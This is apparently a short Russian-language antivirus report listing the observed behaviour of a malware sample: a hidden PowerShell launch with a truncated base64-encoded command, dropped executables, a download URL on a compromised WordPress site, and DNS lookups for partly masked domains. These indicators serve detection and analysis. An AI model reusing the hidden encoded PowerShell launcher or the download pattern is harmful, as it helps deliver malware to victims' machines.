Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\1157277.cvr
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe
- 'de###.#utostar.com.sa':80
- http://de###.#utostar.com.sa/wp-admin/tnibbgr-7y3i2-4052100/
- DNS ASK sa####patil.online
- DNS ASK de###.#utostar.com.sa
- DNS ASK ac#####emagicsjacks.xyz
- DNS ASK he###ghao.club
- DNS ASK re###at.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (со скрытым окном)